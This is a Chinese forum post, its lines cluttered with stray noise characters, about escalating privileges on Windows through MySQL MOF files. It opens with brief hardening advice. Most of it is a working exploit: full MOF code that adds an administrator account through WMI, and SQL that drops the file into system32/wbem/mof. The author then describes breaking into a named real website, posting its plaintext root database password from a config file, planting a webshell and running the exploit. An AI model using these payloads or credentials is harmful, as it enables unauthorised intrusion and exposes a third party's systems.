Mysql mof扩展漏洞防范方法% j+ H, B9 D" _7 w7 b8 t
& v9 f' v- _6 E- p网上公开的一些利用代码:6 K0 }3 p6 Y( Q
0 Y4 Q" m- j& x8 W) t
#pragma namespace(“\\\\.\\root\\subscription”) D6 Z8 j! @9 T3 f
/ n$ H! g9 B2 T% m7 Q) G t
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
; Q* B: I+ i4 T0 I% C+ I' r, ]
* {, t% c) y( U: e) f
! }; C# B8 ]: ~8 e. p
# V) l2 j7 i2 p3 Z
! ~- W4 h3 R! T) Z$ ] L: |$ ~' A/ {
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;; _) a/ F. X4 z- @& G
从上面代码来看得出解决办法:
! @/ Y/ ?3 f" Z# L8 A6 v
9 H$ e6 s# ]2 n7 f' I0 Y+ m: p1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
: L( C, p9 r g3 t5 n1 l! A7 M* m1 ]% @' [4 J, g y9 p- d
2、禁止使用”WScript.Shel”组件
4 H# H9 I; O' K* _! _3 w+ p( }+ V0 y H+ y [5 K2 I* N* E
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
8 n7 Y0 S3 l0 r* m. q4 W" r5 F- i/ }" C% J$ `! _
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
5 o5 ?% g( j1 y' `
+ k5 B& C/ X) N: q f, h事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权! t+ z6 o. {- X5 ^/ ]! ~. e9 d
. d$ d$ c. Q7 C( U* h: |! s
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容9 \7 ^) H5 }; Q, E6 ^
* P ]& A8 h" }! s# J; e7 J看懂了后就开始练手吧
. k7 F3 e) g& B
) P7 E8 _$ r3 p" \ {3 T, `$ Qhttp://www.webbmw.com/config/config_ucenter.php 一句话 a9 @5 C& o: j& j
) Q: z- a3 k; f& [, ?" U" a
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
2 n9 P; l4 m" ?1 ?/ E/ o5 P: e
1 m" y: I0 T+ L" I9 f! J6 o4 ]4 L于是直接用菜刀开搞
; G- e( ^$ W' K9 Y
2 Q% m; i+ s9 P9 n* c: j上马先" p; K2 {$ [! @3 ^6 x# m
0 Z6 F- o& c) B6 n既然有了那些账号 之类的 于是我们就执行吧…….
8 m( ?& n1 r Z6 }" ?/ t, k3 p
7 T2 {1 ?. b: x1 A$ Z9 \小小的说下, D9 I$ S+ ]3 c$ j
. v( e! _- D4 N! u) f在这里第1次执行未成功 原因未知
! ^3 h" i8 r2 Y- {2 t
3 M( Z4 f( Y7 {6 ]我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。9 e& O. V+ ~2 J, ?+ @* L9 [
: {0 j- C, f+ L) b& C3 @#pragma namespace(“\\\\.\\root\\subscription”)
2 l* J* G6 ^( x6 D. ?% [
# b& R2 E9 \1 O4 o" ` B7 b6 ~instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };4 k/ q J4 u( X+ R8 S- x
& E8 Z5 z% k+ O H4 \7 B
我是将文件放到C:\WINDOWS\temp\1.mof! I7 Z- Z& n0 x* |5 \8 J; S7 A% t
* y8 M& s( ~" f# a9 ~. t, o& t- x5 Y所以我们就改下执行的代码4 \1 |( N! S1 I- x: Q+ K6 A
( D- {0 K8 w- S! dselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;6 c) z% t+ q. }# ^+ a$ {
, { V. u: S0 J3 i6 Y: \" ^/ l- H; [7 X ~5 i
" ^2 p5 B! d! e' k" z5 X+ \/ D
但是 你会发现账号还是没有躺在那里。。
) R! _. D' m! K& B, ]- \+ I' e, Z, H/ l9 O1 p' y4 b P
于是我就感觉蛋疼
) R' \7 S( p' x$ ]3 I3 b! A7 a/ f
; y/ i# z1 ~; w( n. r8 ?就去一个一个去执行 但是执行到第2个 mysql时就成功了………
; q4 i% m* n4 i4 ^4 _0 m% @- y- s
' Q& G" I3 W; `$ C# e% q4 M+ ?! `& f' o8 m' { d+ }# l- N% {
& e) \2 s4 k" w% ^
但是其他库均不成功…# p$ v4 ~, ^' Z$ t, A
! S9 i/ B+ w3 O6 c3 o我就很费解呀 到底为什么不成功求大牛解答…
/ k( ?2 @6 n$ v* d' K3 }# Q- a* y' w' M' w2 i
: k5 S/ _1 q8 Q* L% T' e; U
! G! a9 e' b- ?1 e |
发表于 2013-1-4 19:49:49
收藏
支持
反对